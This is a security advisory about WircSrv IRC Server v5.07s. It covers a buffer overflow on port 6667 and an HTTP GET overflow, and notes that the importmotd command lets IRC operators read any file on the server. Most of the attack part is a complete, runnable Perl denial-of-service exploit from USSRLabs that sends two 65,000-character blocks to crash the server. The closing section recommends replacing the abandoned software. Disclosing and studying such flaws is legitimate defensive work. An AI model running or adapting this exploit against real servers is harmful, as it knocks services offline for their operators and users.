COMMAND

    WircSrv

SYSTEMS AFFECTED

    WircSrv Irc Server v5.07s

PROBLEM

    The  Ussr  Labs  team  has  recently  discovered a buffer overflow
    memory problem  in the  WircSrv Irc  Server.   What happens  is by
    performing an  attack with  a malformed  request to  port 6667  it
    will cause the process containing the services to stop responding.

    The  http  Server  (Port  80)  service  has an overflow in the GET
    command

        [hellme@die-communitech.net$ telnet irc.example.com 6667
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        [buffer]

    Where  [buffer]  is  approx.  65000  characters,  and  the process
    containg the service crashes.  Code in Perl:

    #!/usr/bin/perl
    #########################################################
    # Exploit by USSRLabs www.ussrback.com
    # WircSrv Version 5.07s Remote DoS attack
    # send 2 64k blocks of data causes the server to crash.
    #########################################################
    use Getopt::Std;
    use Socket;

    getopts('s:', \%args);
    if(!defined($args{s})){&usage;}

    my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

    $foo = "A";                           # this is the NOP
    $number = "65000";                    # this is the total number of NOP
    $data .= $foo x $number;              # result of $foo times $number
    $serv = $args{s};                     # remote server
    $port =  6667;                        # remote port, default is 6667
    $buf = "$data";                       # issue this response to the server

    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
    connect(S, $paddr) ||die ("Error: $!");
    select(S); $| = 1; select(STDOUT);
    print S "$buf";
    print S "$buf";
    print("Data has been successfully sent to $serv\n");

    sub usage {die("\n\nExploit by USSRLabs www.ussrback.com\nWircSrv
    Version 5.07s
    Remote DoS attack\nsend 2 64k blocks of data causes the server to
    crash.\n -s server_ip\n\n");}

    Andrew Lewis added following.   The feature/bug is the  importmotd
    command, which allows  any IRCOp to  set the motd  to any file  on
    the servers hard-drive(s).  Obviously enough, you trust the IRCOps
    on your server,  but does that  mean you automatically  trust them
    enough to view any file on your system?  Not too sure about that.

SOLUTION

    Wircsrv  is  unmaintained  and  possibly  entered  the  realm   of
    abandonware at  least two  years ago,  due to  "lack of interest".
    Given  that   bugs  are   unlikely  to   be  corrected,   existing
    installations of it should be replaced with some other irc daemon.